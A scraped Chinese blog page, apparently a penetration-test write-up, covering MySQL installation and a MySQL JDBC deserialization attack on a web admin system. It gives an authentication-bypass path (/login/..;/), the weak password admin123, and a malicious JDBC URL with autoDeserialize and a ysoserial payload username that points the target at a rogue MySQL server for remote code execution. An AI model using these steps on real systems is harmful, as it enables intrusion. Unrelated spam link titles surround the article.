当前位置: 首页 > news >正文

整站seo上海公司车牌本月价格

整站seo,上海公司车牌本月价格,成都模板网站建设,app大概需要多少钱MySQL从小白到入土 mysql 服务器安装windows mysql 服务漏洞复现-mysql jdbc反序列化-权限绕过 mysql 服务器安装 https://dev.mysql.com/downloads/mysql/https://www.cnblogs.com/xiaostudy/p/12262804.html 点餐小程序腾讯云服务器安装mysql8 windows mysql 服务 net sta…

在这里插入图片描述

MySQL从小白到入土

  • mysql 服务器安装
  • windows mysql 服务
  • 漏洞复现-mysql jdbc反序列化-权限绕过

mysql 服务器安装

 https://dev.mysql.com/downloads/mysql/

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

https://www.cnblogs.com/xiaostudy/p/12262804.html

点餐小程序腾讯云服务器安装mysql8
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

windows mysql 服务

net start mysql

漏洞复现-mysql jdbc反序列化-权限绕过

乌云 通用系统的洞
fofa 查

在这里插入图片描述

但是这个系统被他魔改过加了验证码,前端也加密了,老洞肯定没有。

在这里插入图片描述
登录框大概长这样,
看了一下有shiro但是打不了。

在这里插入图片描述

权限绕过发现/login/…;/ 能直接进去

在这里插入图片描述
看不到任何数据,点系统参数配置这个功能发现404

在这里插入图片描述
去看了下同cms的站,
发现直接访问index.jsp,
也可以进去(但是src那个站进不去不知道被咋改过)
发现这个功能跳到/adminLogin.jsp 然后弱口令admin123进去了

在这里插入图片描述
当时直接把这个登录的包拿到src的那个站去试了一下

发现他只是把jsp删了实际上功能还在
然后就直接进到了系统参数配置这里

在这里插入图片描述
大概长这样,有一个测试连接的功能,点了一下抓包,包结构如下
在这里插入图片描述
可以控制mysql连接地址,于是想到mysql服务端读客户端文件。
将mysql连接地址改为恶意mysql服务端地址发包,好像不行
在这里插入图片描述
然后又想到mysql jdbc反序列化,以前没搞过,在github找到一个项目。

 https://github.com/fnmsd/MySQL_Fake_Server

需要一个ysoserial.jar我这边使用的

  https://github.com/zema1/ysoserial

可以直接打回显,看了下上面那个项目的README感觉有点麻烦,于是直接把
在这里插入图片描述

 url=jdbc:mysql://x.x.x.x:3306/test?autoDeserialize=true
&useUnicode=true
&characterEncoding=utf-8
&username=yso_urldns_http//www.baidu.com/
&password=123456	 

服务器这边开启恶意mysql服务端,发包。
在这里插入图片描述
在这里插入图片描述
成功RCE

http://www.yayakq.cn/news/715849/

相关文章:

  • 建设成一个网站的程序学做甜品的网站
  • 网站的建设目标是什么如何用模板搭建网站
  • 自适应式网站月饼营销软文
  • 外包加工网站网站建设与推广推荐
  • 外贸网站建设价格怎么样网络营销岗位介绍
  • 上传文件网站怎么添加网站图标
  • 建设网站要注意事项网站推广的方法和渠道
  • 网络上做假网站做物流深汕特别合作区天气预报
  • 投资网站维护广州教育网站设计公司
  • 减肥单页网站台州网站建站
  • 建设网站用什么好网站海外推广外包
  • wordpress资源下载站湖州市建设培训中心网站
  • 青岛专业网站建设定制建设网站的软件下载
  • 东莞做商城网站建设哪家好做啥网站好
  • 做微推的网站上海微信小程序开发公司
  • 网站建设公司推荐php工具箱是直接做网站的吗
  • 郑州软件网站建设南宁360网
  • 2W网站建设的作用想成为网站设计师要怎么做
  • 深圳极速网站建设定制网站建设需要那种技术
  • 政务公开 网站建设自助建设视频网站
  • 招聘网站的SEO怎么做宁波网站制作与推广
  • 做淘宝客找商品网站有哪些微信开放平台的发展前景
  • 大兴黄村网站建设公司电子商务网站采用的开发技术
  • 台州手机网站开发自响应式网站建设清单
  • 网站建设与运维预算凡科建站和华为云哪个好
  • 简述网站建设centos7怎么做网站服务器
  • 深圳网站建设的价格关于学校的网页设计
  • 营销网站建设需要多少钱wordpress主题 双语
  • 电子 网站模板网络优化的流程
  • 慢慢来做网站多少钱调研园区网站建设工作总结